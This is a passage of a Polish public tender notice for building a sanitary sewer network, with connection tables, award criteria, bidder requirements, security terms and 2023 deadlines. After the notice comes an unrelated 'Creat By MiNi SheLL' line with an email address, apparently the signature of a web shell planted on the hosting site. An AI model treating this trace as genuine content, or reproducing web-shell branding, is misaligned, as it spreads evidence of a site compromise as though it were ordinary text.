S35; S36; S37; S38; S39; S40; S41; S42; S43; S44; S45; S46; S11; S64; S65; S66; S67; S68; S69; S69a; S83; S70; S39a; S40a; S75 – 41 kpl. <br/>o)	Odtworzenie podbudowy z kamienia gr 20 cm w miejscach studni kanalizacyjnych – 3230,00 m2.<br/>p)	Odtworzenie nawierzchni drogi na całej szerokości drogi 5 mb na odcinku od S18 do S46 warstwa wiążąca 4 cm oraz warstwa ścieralna 4 cm – 6460 m2,<br/><br/>3)	Budowa przyłączy grawitacyjnych DN160 PVC SN80 wg poniższego zestawienia<br/>Lp.	Adres przyłącza	Nr.	Długość<br/>mb	Studzienka systemowa DN400 PP przy granicy posesji	Punkt przyłączeniowy studnia/trójnik<br/>1	Ul. Dębskiej Kuźni 78	5,5	1 szt.	S3<br/>2	Ul. Dębskiej Kuźni 49	8,0	1 szt.	S6<br/>3	Ul. Dębskiej Kuźni 76	3,5	1 szt.	Tr1<br/>4	Ul. Dębskiej Kuźni 74	1,5	1 szt.	Tr1a<br/>5	Ul. Dębskiej Kuźni 72	3,5	1 szt.	T2<br/>6	Ul. Dębskiej Kuźni 70	4,0	1 szt.	S9<br/>7	Ul. Dębskiej Kuźni Dz. Nr 1165/7	3,5	1 szt.	T3<br/>8	Ul. Dębskiej Kuźni 68	4,00	1 szt.	T4<br/>9	Ul. Dębskiej Kuźni 41	4,00	1 szt.	S19<br/>10	Ul. Dębskiej Kuźni 64	2,50	1 szt.	S65<br/>11	Ul. Dębskiej Kuźni 62	6,50	1 szt.	S21<br/>12	Ul. Dębskiej Kuźni 39	5,00	1 szt.	T5<br/>13	Ul. Dębskiej Kuźni 37	5,00	1 szt.	S22<br/>14	Ul. Dębskiej Kuźni 60	6,00	1 szt.	T6<br/>15	Ul. Dębskiej Kuźni 35	5,50	1 szt.	T7<br/>16	Ul. Dębskiej Kuźni 52	4,50	1 szt.	T37<br/>17	Ul. Dębskiej Kuźni 58	7,50	1 szt.	T38<br/>18	Ul. Dębskiej Kuźni 54	6,50	1 szt.	S67<br/>19	Ul. Dębskiej Kuźni 56	8,00	1 szt.	S67<br/>20	Ul. Dębskiej Kuźni 33	5,50	1 szt.	S24<br/>21	Ul. Dębskiej Kuźni 48	7,00	1 szt.	T7a<br/>22	Ul. Dębskiej Kuźni 46	6,00	1 szt.	S27<br/>23	Ul. Dębskiej Kuźni 44	6,00	1 szt.	T8<br/>24	Ul. Dębskiej Kuźni 31	3,00	1 szt.	S29<br/>25	Ul. Dębskiej Kuźni 40	5,00	1 szt.	T9<br/>26	Ul. Dębskiej Kuźni 29	6,00	1 szt.	T10<br/>27	Ul. Dębskiej Kuźni 38	6,00	1 szt.	T11<br/>28	Ul. Dębskiej Kuźni 27	4,50	1 szt.	S30<br/>29	Ul. Dębskiej Kuźni 25	5,00	1 szt.	T12<br/>30	Ul. Dębskiej Kuźni 36	4,50	1 szt.	S69a<br/>31	Ul. Dębskiej Kuźni 34	3,50	1 szt.	S69<br/>32	Ul. Dębskiej Kuźni 32	6,00	1 szt.	S32<br/>33	Ul. Dębskiej Kuźni 30	6,50	1 szt.	T13<br/>34	Ul. Dębskiej Kuźni 23	5,50	1 szt.	S34<br/>35	Ul. Dębskiej Kuźni 28	9,00	1 szt.	T14<br/>36	Ul. Dębskiej Kuźni 26	5,50	1 szt.	T15<br/>37	Ul. Dębskiej Kuźni 19a	6,50	1 szt.	T16<br/>38	Ul. Dębskiej Kuźni 24	5,50	1 szt.	S37<br/>39	Ul. Dębskiej Kuźni 22	7,00	1 szt.	T17<br/>40	Ul. Dębskiej Kuźni	21	5,50	1 szt.	S70<br/>41	Ul. Dębskiej Kuźni 20	7,00	1 szt.	T19<br/>42	Ul. Dębskiej Kuźni 18	4,00	1 szt.	S39a<br/>43	Ul. Dębskiej Kuźni	17	5,50	1 szt.	T18<br/>44	Ul. Dębskiej Kuźni 16	9,00	1 szt.	S39a<br/>45	Ul. Dębskiej Kuźni 14	7,50	1 szt.	T20<br/>46	Ul. Dębskiej Kuźni	13	5,50	1 szt.	T21<br/>47	Ul. Sadowa 3	15,00	1 szt.	S40a<br/>48	Ul. Sadowa 5	8,00	1 szt.	S40a<br/>49	Ul. Dębskiej Kuźni Dz. Nr 208	2,00	1 szt.	T51<br/>50	Ul. Dębskiej Kuźni 12	9,50	1 szt.	T22<br/>51	Ul. Dębskiej Kuźni 10	6,00	1 szt.	T23<br/>52	Ul. Dębskiej Kuźni 11	6,00	1 szt.	T24<br/>53	Ul. Dębskiej Kuźni 8	6,00	1 szt.	S41<br/>54	Ul. Dębskiej Kuźni 9	3,50	1 szt.	S42<br/>55	Ul. Dębskiej Kuźni 4a	7,00	1 szt.	T25<br/>56	Ul. Dębskiej Kuźni 7	4,00	1 szt.	T26<br/>57	Ul. Dębskiej Kuźni 2	6,00	1 szt.	S43<br/>58	Ul. Dębskiej Kuźni 3	5,50	1 szt.	S43<br/>59	Ul. Dębskiej Kuźni 1	5,50	1 szt.	T27<br/>60	Ul. Ozimska 17	6,00	1 szt.	S45<br/>	RAZEM 342	60 szt	<br/> <br/>4)	Budowa przyłączy ciśnieniowych wg poniższego zestawienia<br/>Lp.	Adres przyłącza	Nr.	Długość PEHD DN40<br/>mb	Przepompownia przydomowa kompletna z zasilaniem Punkt przyłączeniowy studnia/trójnik<br/>1	Ul. Dębskiej Kuźni 66	38,5	1 szt.	S65<br/>2	Ul. Leśna 3	133	1 szt.	S69<br/>	RAZEM 171,5	2 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232411-6 - Roboty budowlane w zakresie rurociągów wody ściekowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwości udzielenia zamówień polegających na powtórzeniu podobnych robót budowlanych w rozumieniu przepisu art. 214 ust. 1 pkt 7 i 8 Pzp do 25% wartości zamówienia podstawowego tj. dokonanie dodatkowych max. 20 szt. przyłączy kanalizacyjnych ciśnieniowych oraz wykonanie max. 600,00 m rurociągów ciśnieniowych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą uznana zostanie oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>a)	Cena (C)	<br/>b)	Okres gwarancji i rękojmi na wykonane roboty budowlane (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	Zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/><br/>3)	Sytuacji ekonomicznej lub finansowej: <br/>W zakresie warunku dotyczącego sytuacji finansowej, o udzielenie przedmiotowego zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 1.500.000,00 zł. W sytuacji składania oferty przez dwa lub więcej podmiotów (wykonawcy wspólnie ubiegający się o udzielenie zamówienia) Zamawiający uzna spełnienie tego warunku udziału w postępowaniu, jeżeli wspólnie wykażą oni, iż posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 1.500.000,00 zł.<br/><br/>4)	Zdolności technicznej lub zawodowej: <br/>a)	Zdolność techniczna<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył: <br/><br/>•	co najmniej 2 zamówienia polegające na budowie lub przebudowie sieci kanalizacji sanitarnej o wartości nie mniejszej niż 2.000 000,00 zł netto każda<br/><br/>UWAGA: <br/>•	Jeżeli Wykonawca na potwierdzenie spełniania warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej wykaże się realizacją robót, których wartość wyrażona zostanie w walucie innej niż PLN, Zamawiający w celu dokonania oceny spełniania warunku udziału w postępowaniu dokona przeliczenia wskazanej wartości według średniego kursu NBP z dnia wszczęcia (ogłoszenia) postępowania w Biuletynie Zamówień Publicznych. Jeżeli w dniu ogłoszenia postępowania NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje. <br/><br/>b)	Zdolność zawodowa: <br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj.: <br/>•	1 (jedną) osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń;<br/>•	1 (jedną) osobą, która będzie pełniła funkcję kierownika branży drogowej posiadającą uprawniania budowlane do kierowania robotami branży inżynieryjnej drogowej lub odpowiadające im ważne uprawniana drogowe, które zostały wydane na podstawie wcześniejszych obowiązujących przepisów.<br/><br/>Zamawiający dopuszcza możliwość łączenia funkcji kierownika budowy/kierowników robót poszczególnych branż wymienionych powyżej, pod warunkiem wykazania się niezbędnymi uprawnieniami do kierowania robotami dla każdej z branży i wymaganym doświadczeniem z zastrzeżeniem, że jedna osoba nie może pełnić więcej niż dwóch funkcji. <br/><br/>Wymieniony skład osobowy zespołu Wykonawcy należy traktować jako minimalne wymagania Zamawiającego i nie wyczerpuje całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań Wykonawcy. <br/>W celu udokumentowania wymaganych kwalifikacji i doświadczenia osób, opisanych powyżej, Wykonawca powinien przedstawić wykaz osób, którymi dysponuje lub będzie dysponować i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nie czynności i/lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.<br/>W trakcie realizacji przedmiotu Umowy Zamawiający przewiduje możliwość zmiany osób skierowanych do wykonania Zamówienia, jednakże pod warunkiem wyrażenia pisemnej zgody przez Zamawiającego, a osoby te spełniać będą wymogi określone w SWZ w zakresie kwalifikacji zawodowych i wykształcenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ; <br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>3)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – załącznik nr 7 do SWZ. <br/>4)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ<br/>5)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>Jeżeli Wykonawca na potwierdzenie spełniania warunku udziału w postępowaniu dotyczącego posiadania sytuacji finansowej wykaże się posiadaniem środków finansowych lub zdolnością kredytową, których wartość wyrażona zostanie w walucie innej niż PLN, Zamawiający w celu dokonania oceny spełniania warunku udziału w postępowaniu dokona przeliczenia wskazanej wartości według średniego kursu NBP z dnia wszczęcia (ogłoszenia) postępowania w Biuletynie Zamówień Publicznych. Jeżeli w dniu ogłoszenia postępowania NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy najpóźniej w dniu jej zawarcia, w wysokości 5% ceny całkowitej (kwota brutto) podanej w ofercie.<br/>2.	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	w pieniądzu na rachunek bankowy Zamawiającego: 12 89071063 20087006 6514 0005 Bank Spółdzielczy Leśnica Filia Chrząstowice<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3)	gwarancjach bankowych;<br/>4)	gwarancjach ubezpieczeniowych;<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach określonych art. 450 ust. 2 ustawy Pzp.<br/>4.	Z treści zabezpieczenia przedstawionego w formie gwarancji i poręczenia winno wynikać, że bank, ubezpieczyciel, poręczyciel zapłaci, na rzecz Zamawiającego w terminie maksymalnie 30 dni od pisemnego żądania kwotę zabezpieczenia, na pierwsze wezwanie Zamawiającego, bez odwołania, bez warunku, niezależnie od kwestionowania czy zastrzeżeń Wykonawcy i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione, czy nie.<br/>5.	W przypadku, gdy zabezpieczenie, będzie wnoszone w formie innej niż pieniądz, Zamawiający zastrzega sobie prawo do akceptacji projektu ww. dokumentu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 20 wzoru umowy (zał nr 8a i 8b) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com